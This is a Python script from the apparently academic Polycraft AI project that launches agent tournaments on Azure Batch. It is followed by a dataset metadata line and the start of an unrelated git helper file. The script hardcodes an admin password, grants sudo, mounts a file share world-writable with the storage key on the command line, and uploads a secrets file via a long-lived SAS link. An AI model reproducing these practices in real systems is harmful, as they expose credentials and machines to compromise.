azureblob\nimport azure.batch._batch_service_client as batch\nimport azure.batch.batch_auth as batchauth\nimport azure.batch.models as batchmodels\n\nimport PolycraftAIGym.common.helpers as helpers\nfrom AzureBatch.AgentBatchCommands import AgentType, AgentBatchCommands\n\n_CONTAINER_NAME = 'batch-workflow-fog-of-war'\n\nDEBUG_FLAG = False\n\n### SIFT ###\nAPPLICATION_ID = 'agent_sift'\nAPPLICATION_VERSION = '9'\nAPPLICATION_ID_FIXED = 'agent_sift'\nAPPLICATION_DIR = 
'$AZ_BATCH_APP_PACKAGE_' + APPLICATION_ID_FIXED + '_' + APPLICATION_VERSION\n\n### TUFTS ###\nTUFT_APPLICATION_ID = 'agent_tufts'\nTUFT_VERSION = '3'\nTUFT_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + TUFT_APPLICATION_ID + '_' + TUFT_VERSION\n### GT ###\nGT_APP_ID = 'agent_gt_pogo'\nGT_APPLICATION_VERSION = '6'\nGT_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_APP_ID + '_' + GT_APPLICATION_VERSION\n\n### GT Plan ###\nGT_PLAN_APP_ID = 'agent_gt_pogo_planner'\nGT_PLAN_APPLICATION_VERSION = '1'\nGT_PLAN_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_PLAN_APP_ID + '_' + GT_PLAN_APPLICATION_VERSION\n\n\n### GT HG ###\nGT_HUGA_APP_ID = 'agent_gt_huga_1'\nGT_HUGA_APP_VERSION = '1'\nGT_HUGA_APP_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_HUGA_APP_ID + '_' + GT_HUGA_APP_VERSION\n\n### GT HG MATLAB ###\nGT_HUGA_MLAB_APP_ID = 'agent_gt_huga_matlab'\nGT_HUGA_MLAB_APP_VERSION = '1'\nGT_HUGA_MLAB_APP_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_HUGA_MLAB_APP_ID + '_' + GT_HUGA_MLAB_APP_VERSION\n\n### SRI ###\nSRI_APP_ID = 'agent_sri'\nSRI_VERSION = '2'\nSRI_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + SRI_APP_ID + '_' + SRI_VERSION\n\n### RAYTHEON ###\nRAYTHEON_APP_ID = 'agent_raytheon' # APP ID\nRAYTHEON_VERSION = '3'\nRAYTHEON_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + RAYTHEON_APP_ID + '_' + RAYTHEON_VERSION\n\n\nAPP_DICT = {'agent_sift': APPLICATION_DIR,\n 'agent_tufts': TUFT_APPLICATION_DIR,\n 'agent_gt_pogo': GT_APPLICATION_DIR,\n 'agent_sri': SRI_APPLICATION_DIR,\n 'agent_gt_huga_1': GT_HUGA_APP_DIR,\n 'agent_gt_huga_matlab': GT_HUGA_MLAB_APP_DIR,\n 'agent_gt_pogo_planner': GT_PLAN_APPLICATION_DIR,\n 'agent_raytheon': RAYTHEON_APPLICATION_DIR,\n }\n\n# _SIMPLE_TASK_NAME = 'simple_task.py'\n# _SIMPLE_TASK_PATH = os.path.join('resources', 'simple_task.py')\n\n\nclass AzureBatchLaunchTournaments:\n\n def __init__(self, agent_name, agent_type, library_of_tournaments, global_config, pool, suffix=None):\n self.agent_name = agent_name\n self.agent_type = agent_type\n self.suffix = suffix\n self.pool = pool\n self.library_of_tournaments = library_of_tournaments\n self.global_config = global_config\n self.agent_commands = AgentBatchCommands(APP_DICT, self.agent_name, self.agent_type)\n # later self.commands = AgentBatchCommands.AgentBatchCommands(self.agent_name, self.agent_type, )\n\n def create_pool(self, batch_client, block_blob_client, vm_size, pool_id, vm_count):\n \"\"\"Creates an Azure Batch pool with the specified id.\n\n :param batch_client: The batch client to use.\n :type batch_client: `batchserviceclient.BatchServiceClient`\n :param block_blob_client: The storage block blob client to use.\n :type block_blob_client: `azure.storage.blob.BlockBlobService`\n :param str pool_id: The id of the pool to create.\n :param str vm_size: vm size (sku)\n :param int vm_count: number of vms to allocate\n \"\"\"\n # pick the latest supported 16.04 sku for UbuntuServer\n sku_to_use, image_ref_to_use = \\\n helpers.select_latest_verified_vm_image_with_node_agent_sku(\n batch_client, 'Canonical', 'UbuntuServer', '18.04')\n\n block_blob_client.create_container(_CONTAINER_NAME, fail_on_exist=False)\n\n\n application_package_references = [\n # batchmodels.ApplicationPackageReference(application_id=APPLICATION_ID, version=APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=TUFT_APPLICATION_ID, version=TUFT_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_APP_ID, version=GT_APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=SRI_APP_ID, 
version=SRI_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_APP_ID, version=GT_HUGA_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_MLAB_APP_ID, version=GT_HUGA_MLAB_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_PLAN_APP_ID, version=GT_PLAN_APPLICATION_VERSION),\n batchmodels.ApplicationPackageReference(application_id=RAYTHEON_APP_ID, version=RAYTHEON_VERSION),\n ]\n\n # Create User Accounts\n users = [\n batchmodels.UserAccount(\n name='azureuser',\n password='adminAcct$1',\n elevation_level=batchmodels.ElevationLevel.admin),\n # batchmodels.UserAccount(\n # name='pool-nonadmin',\n # password='******',\n # elevation_level=batchmodels.ElevationLevel.non_admin)\n ]\n\n pool = batchmodels.PoolAddParameter(\n id=pool_id,\n virtual_machine_configuration=batchmodels.VirtualMachineConfiguration(\n image_reference=batchmodels.ImageReference(\n publisher=\"Canonical\",\n offer=\"UbuntuServer\",\n sku=\"18.04-LTS\",\n version=\"latest\"\n ),\n node_agent_sku_id=\"batch.node.ubuntu 18.04\"),\n vm_size=vm_size,\n user_accounts=users,\n target_dedicated_nodes=vm_count,\n application_package_references=application_package_references,\n\n # mount_configuration=[batch.models.MountConfiguration(\n # azure_file_share_configuration=batch.models.AzureFileShareConfiguration(\n # account_name=global_config.get('Storage', 'storageaccountname'),\n # azure_file_url=\"https://polycrafttournamentdata.file.core.windows.net/pal-sift\",\n # account_key=global_config.get('Storage', 'storageaccountkey'),\n # relative_mount_path='sift_file_share')\n # ),\n # ],\n\n\n start_task=batchmodels.StartTask(\n command_line=helpers.wrap_commands_in_shell('linux', [\n 'whoami',\n 'usermod -aG sudo azureuser', # Run the setup scripts as ROOT and add azureuser to the sudoers file\n 'apt-get install software-properties-common',\n # causes issues if this is run as azureuser? 
see: https://askubuntu.com/questions/1109982/e-could-not-get-lock-var-lib-dpkg-lock-frontend-open-11-resource-temporari\n 'apt-add-repository universe',\n 'apt-get update',\n 'apt-get update && apt-get install cifs-utils && sudo mkdir -p /mnt/PolycraftFileShare',\n f'mount -t cifs //polycrafttournamentdata.file.core.windows.net/pal-sift /mnt/PolycraftFileShare -o vers=3.0,username={self.global_config.get(\"Storage\", \"storageaccountname\")},password={self.global_config.get(\"Storage\", \"storageaccountkey\")},dir_mode=0777,file_mode=0777,serverino && ls /mnt/PolycraftFileShare',\n 'mkdir ~/matlab && cp /mnt/PolycraftFileShare/setup/MATLAB_Runtime_R2020a_Update_2_glnxa64.zip ~/matlab/',\n 'cd ~/matlab',\n 'apt install unzip -y',\n 'unzip MATLAB_Runtime_R2020a_Update_2_glnxa64.zip',\n './install -mode silent -agreeToLicense yes',\n 'export LD_LIBRARY_PATH=/usr/local/MATLAB/MATLAB_Runtime/v98/runtime/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/bin/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/sys/os/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/extern/bin/glnxa64${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}',\n # 'sudo apt-get install -y python3-pip'\n ]),\n # TODO: include add'l resource files for initial startup\n wait_for_success=True,\n # user_accounts=users,\n user_identity=batchmodels.UserIdentity(\n # user_name='azureuser',\n auto_user=batchmodels.AutoUserSpecification(\n scope=batchmodels.AutoUserScope.pool,\n elevation_level=batchmodels.ElevationLevel.admin)\n # ),\n\n ),\n\n ),\n )\n\n helpers.create_pool_if_not_exist(batch_client, pool)\n\n def submit_job_and_add_task(self, batch_client, block_blob_client, job_id, pool_id):\n \"\"\"Submits a job to the Azure Batch service and adds\n a task that runs a python script.\n\n :param batch_client: The batch client to use.\n :type batch_client: `batchserviceclient.BatchServiceClient`\n :param block_blob_client: The storage block blob client to use.\n :type block_blob_client: `azure.storage.blob.BlockBlobService`\n :param str job_id: The id of the job to create.\n :param str pool_id: The id of the pool to use.\n \"\"\"\n job = batchmodels.JobAddParameter(\n id=job_id,\n pool_info=batchmodels.PoolInformation(pool_id=pool_id),\n on_all_tasks_complete='terminateJob',\n )\n\n batch_client.job.add(job)\n\n block_blob_client.create_container(\n _CONTAINER_NAME,\n fail_on_exist=False)\n\n # os.chdir('../output/')\n count = 0\n maxCount = 1 # TODO: move this.\n for file in os.listdir(f'{self.library_of_tournaments}'):\n if count >= maxCount and DEBUG_FLAG:\n break\n if not file.endswith(\".zip\"):\n continue\n filename = file.split('.')[0]\n\n # Get commands\n cmds = self.agent_commands.get_task_commands(file, filename, self.suffix)\n\n application_package_references = [\n # batchmodels.ApplicationPackageReference(application_id=APPLICATION_ID, version=APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=TUFT_APPLICATION_ID, version=TUFT_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_APP_ID, version=GT_APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=SRI_APP_ID, version=SRI_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_APP_ID, version=GT_HUGA_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_MLAB_APP_ID,\n # version=GT_HUGA_MLAB_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_PLAN_APP_ID,\n # version=GT_PLAN_APPLICATION_VERSION),\n 
batchmodels.ApplicationPackageReference(application_id=RAYTHEON_APP_ID, version=RAYTHEON_VERSION),\n ]\n\n user_identity = batch.models.UserIdentity(\n # user_name='azureuser',\n auto_user=batch.models.AutoUserSpecification(\n scope=batch.models.AutoUserScope.pool,\n elevation_level=batch.models.ElevationLevel.admin)\n )\n\n sas_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n 'inputs-test/' + file,\n self.library_of_tournaments + file,\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n setup_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"setup_azure_batch_initial.sh\",\n 'setup_azure_batch_initial.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n secret_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"secret_real.ini\",\n '../secret_real.ini',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n sri_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"sri_run.sh\",\n '../sri_run.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n sift_wrap = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"agents/sift_tournament_agent_launcher.sh\",\n '../sift_tournament_agent_launcher.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n constraint = batchmodels.TaskConstraints(\n retention_time=datetime.timedelta(minutes=1440),\n )\n\n task = batchmodels.TaskAddParameter(\n id=f\"Tournament-{str(count)}-{filename}\",\n command_line=helpers.wrap_commands_in_shell('linux', cmds),\n constraints=constraint,\n resource_files=[\n batchmodels.ResourceFile(\n file_path=file,\n http_url=sas_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'setup_azure_batch_initial.sh',\n http_url=setup_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'sri_run.sh',\n http_url=sri_url),\n batchmodels.ResourceFile(\n file_path='secret_real.ini',\n http_url=secret_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'sift_tournament_agent_launcher.sh',\n http_url=sift_wrap),\n ],\n application_package_references=application_package_references,\n user_identity=user_identity)\n\n batch_client.task.add(job_id=job.id, task=task)\n\n count += 1\n\n def execute_sample(self):\n \"\"\"Executes the sample using the global configuration supplied when this\n instance was constructed (``self.global_config``).\n \"\"\"\n # Set up the configuration\n batch_account_key = self.global_config.get('Batch', 'batchaccountkey')\n batch_account_name = self.global_config.get('Batch', 'batchaccountname')\n batch_service_url = self.global_config.get('Batch', 'batchserviceurl')\n\n storage_account_key = self.global_config.get('Storage', 'storageaccountkey')\n storage_account_name = self.global_config.get('Storage', 'storageaccountname')\n storage_account_suffix = self.global_config.get(\n 'Storage',\n 'storageaccountsuffix')\n storage_account_connection_string = self.global_config.get('Storage', 'storageconnectionstring')\n\n should_delete_container = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletecontainer')\n should_delete_job = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletejob')\n should_delete_pool = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletepool')\n pool_vm_size = self.global_config.get(\n 
'DEFAULT',\n 'poolvmsize')\n pool_vm_count = self.global_config.getint(\n 'DEFAULT',\n 'poolvmcount')\n\n # Print the settings we are running with\n helpers.print_configuration(self.global_config)\n # helpers.print_configuration(sample_config)\n\n credentials = batchauth.SharedKeyCredentials(\n batch_account_name,\n batch_account_key)\n batch_client = batch.BatchServiceClient(\n credentials,\n batch_url=batch_service_url)\n\n # Retry 5 times -- default is 3\n batch_client.config.retry_policy.retries = 5\n\n # azureblob.BlobServiceClient()\n\n block_blob_client = azureblob.BlockBlobService(\n account_name=storage_account_name,\n account_key=storage_account_key,\n endpoint_suffix=storage_account_suffix)\n # https://pal.centralus.batch.azure.com\n\n # block_blob_client = azureblob.BlobServiceClient.from_connection_string(\n # storage_account_connection_string)\n\n job_id = helpers.generate_unique_resource_name(\n f\"{self.agent_name}_Tournaments\")\n pool_id = self.pool\n # try:\n self.create_pool(\n batch_client,\n block_blob_client,\n pool_vm_size,\n pool_id,\n pool_vm_count,\n )\n\n self.submit_job_and_add_task(\n batch_client,\n block_blob_client,\n job_id,\n pool_id,\n )\n\n # helpers.wait_for_tasks_to_complete(\n # batch_client,\n # job_id,\n # datetime.timedelta(minutes=180))\n\n tasks = batch_client.task.list(job_id)\n task_ids = [task.id for task in tasks]\n print(task_ids)\n # helpers.print_task_output(batch_client, job_id, task_ids)\n # finally:\n # # clean up\n # if should_delete_container:\n # block_blob_client.delete_container(\n # _CONTAINER_NAME,\n # fail_not_exist=False)\n # if should_delete_job:\n # print(\"Deleting job: \", job_id)\n # batch_client.job.delete(job_id)\n # if should_delete_pool:\n # print(\"Deleting pool: \", pool_id)\n # batch_client.pool.delete(pool_id)\n\n\ndef launch_tournament_wrapper(agent, agentType, test_type, global_config, pool, suffix, tournament_directory, ):\n \"\"\"\n Launch Script to kick off a series of Tournaments for a given Agent in a named pool\n Launch ALl tournaments that belong in the same pool using this function\n\n :param agent: Agent Name (Note: this will create a new Table and View if the agent doesn't already exist)\n :param agentType: Agent Type (Enum - see AgentBatchCommands for valid options)\n :param test_type: See Enum\n :param global_config: Global Config parser object - make sure to create a file called AzureBatch.cfg\n :param pool: name of pool to be created\n :param suffix: Tournament Name suffix (usually, date and hour of execution)\n :param tournament_directory: Location within which to search for all tournament zips\n I.e., all_tournaments_provided/pogo/ will get the zips from all of the sub folders for the right game type\n (i.e. all zips inside a X1000/ folder if TestType.Stage6 is passed in)\n\n \"\"\"\n\n tournaments_to_launch = get_tournaments(test_type, tournament_directory)\n for folder in tournaments_to_launch:\n # pass\n agent_pool = AzureBatchLaunchTournaments(agent, agentType, folder, global_config, pool, suffix)\n agent_pool.execute_sample()\n\n\ndef get_tournaments(test_type,tournament_directory):\n \"\"\"\n Helper script to iterate through a tournament directory and get all tournament zips of a particular test type\n (i.e. 
,TestType.Stage6 will return any zip file within an X1000/ folder.\n :param test_type: Testing Stage - see Enum\n :param tournament_directory: Folder within which to search for zips recursively.\n :return: A list of zips (each zip file is a tournament that will become a task to complete in the parent pool)\n \"\"\"\n\n output = []\n for subdir, folders, files in os.walk(f'{tournament_directory}'):\n for file in files:\n if file.endswith('.zip') and test_type.value in file:\n print(f'{subdir}/{file}')\n zip = f'{subdir}/{file}'\n output.append(f'{subdir}/')\n\n output = list(set(output))\n return output\n\ndef launch_pools_per_novelty(agent, agentType, test_type, global_config, pool, suffix, tournament_directory, ):\n r=f'{os.getcwd()}/{tournament_directory}'\n pools = {f'{a}': f'{r}/{a}/' for a in os.listdir(r) if not '.' in a}\n print(pools)\n for pool_name, tournaments in pools.items():\n tournaments_to_launch = get_tournaments(test_type, f'{tournament_directory}{pool_name}/')\n print(f\"pool name: {pool}{pool_name}\")\n print(tournaments_to_launch)\n for folder in tournaments_to_launch:\n # pass\n agent_pool = AzureBatchLaunchTournaments(agent, agentType, folder, global_config, f\"{pool}{pool_name}\", suffix)\n agent_pool.execute_sample()\n\n\nfrom enum import Enum\n\nclass TestType(Enum):\n STAGE4 = \"X0010\"\n STAGE5 = \"X0100\"\n STAGE6 = \"X1000\"\n\n\n\nif __name__ == '__main__':\n global_config = configparser.ConfigParser()\n global_config.read(helpers._SAMPLES_CONFIG_FILE_NAME)\n #\n global_config.set('DEFAULT', 'poolvmcount', '5')\n\n # launch_pools_per_novelty(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/old/tufts_0626_launch/\",\n # )\n huga_files = \"C:\\\\Users\\\\DhruvNarayanan\\\\Polycraft World\\\\Polycraft World (Internal) - Documents\\\\05. SAIL-ON Program\\\\00. 06-12 Months\\\\98. 
12M Tournament Files\\\\huga-6M-tournaments-zipped\\\\HUGA_L00_T01_S01\"\n\n launch_tournament_wrapper(\n \"RAYTHEON_AGENT_V1\",\n AgentType.RAYTHEON,\n TestType.STAGE5,\n global_config,\n pool=\"RAYTHEON_AGENT_TEST_X100_V1\",\n suffix=\"_110820\",\n tournament_directory=huga_files,\n )\n\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L1T2\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n # )\n #\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L2\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n # )\n #\n #\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L3\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L03_T01_S01_FAKE_RECIPE_O/\",\n # )\n\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\"\n # AgentType.GT_POGO_PLAN_BASELINE,\n #\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '12')\n # #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L1\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L01_T02_S02_DETRITUS/\")\n #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L2\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L02_T01_S01_WALL_COLOR/\")\n #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L3\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L03_T01_S01_SCREEN_FLIP/\")\n\n # #\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_R2_L1\",\n # suffix=\"_062221\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n # )\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_R2_L2\",\n # suffix=\"_062221\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n # )\n #\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_VIRGIN_X100\",\n # suffix=\"_062322\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L03_T01_S01_FAKE_RECIPE_O/\",\n # )\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_VIRGIN_X100\",\n # suffix=\"_062322\",\n # tournament_directory=\"../tournaments/pogo_no_novelty/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '16')\n\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # 
test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L1_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl1a/\",\n # )\n\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L1_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl1b/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '18')\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L2_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl2a/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L2_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl2b/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L3_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl3a/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L3_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl3b/\",\n # )\n\n # launch_tournament_wrapper(\n # agent=\"TUFTS_AGENT_TEST_V3\",\n # agentType=AgentType.TUFTS,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_TUFTS_L2_T7\",\n # suffix=\"_062522\",\n # tournament_directory=\"../tournaments/pogo_l2_t7/\",\n # )\n\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_1a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl1a/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '12')\n\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_3a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl3a/\",\n # )\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_3b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl3b/\",\n # )\n #\n # global_config.set('DEFAULT', 'poolvmcount', '18')\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_1b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl1b/\",\n # )\n # #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_2a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl2a/\",\n # )\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_2b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl2b/\",\n # )\n\n # 
launch_tournament_wrapper(\n # agent=\"SRI_AGENT_TEST_V2\",\n # agentType=AgentType.SRI,\n # test_type=TestType.STAGE6,\n # global_config=global_config,\n # pool=\"HUGA_SRI_VIRGIN_1000\",\n # suffix=\"_061913\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/huga/HUGA_L00_T01_S01_VIRGIN/\",\n # )\n\n\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V5\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_X100_TREES2\",\n # suffix=\"_061619\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n #\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V5\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_X100_AXE2\",\n # suffix=\"_061619\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n #\n # )\n\n\n # launch_tournament_wrapper( \"SIFT_AGENT_TEST_V4\",\n # AgentType.SIFT,\n # TestType.STAGE6,\n # global_config,\n # pool=\"POGO_SIFT_X1000_VIRGIN\",\n # suffix=\"_061114\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L00_T01_S01_VIRGIN/\",\n # )\n #\n\n #\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_02\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_EMH\",\n # suffix=\"_061001\",\n # tournament_directory=\"../tournaments/EMH_pogo_provided/\",\n # )\n # launch_tournament_wrapper(\"GT_AGENT_2_TEST_V3\",\n # AgentType.GT_POGO_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_L2_X100_POOL\",\n # suffix=\"_060911\",\n # tournament_directory=\"../tournaments/g10/pogo/\",\n # )\n\n # launch_tournament_wrapper( \"GT_Trained_HUGA_1_V1\",\n # AgentType.GT_HG_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_X100_POOL_GT\",\n # suffix=\"_060821\",\n # tournament_directory=\"../tournaments/g10/HUGA_L00_T01_S01_VIRGIN/\",\n # )\n\n\n","repo_name":"StephenGss/PAL","sub_path":"AzureBatch/AzureBatchLaunchTournaments.py","file_name":"AzureBatchLaunchTournaments.py","file_ext":"py","file_size_in_byte":34273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24672011013","text":"\"\"\"Helper for Jenkins pipeline deployments.\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport subprocess\nimport sys\n\n\ndef git_resolve(url, version):\n if len(version) == 40:\n # revision.\n try:\n int(version, 16)\n except ValueError:\n pass\n else:\n return version\n # Symbolic name?\n cmd = subprocess.Popen(\n [\"git\", \"ls-remote\", url, version + \"^{}\"], stdout=subprocess.PIPE\n )\n stdout, stderr = cmd.communicate()\n # if its not a tag, start another more generic attempt\n if not stdout:\n cmd = subprocess.Popen(\n [\"git\", \"ls-remote\", url, version], stdout=subprocess.PIPE\n 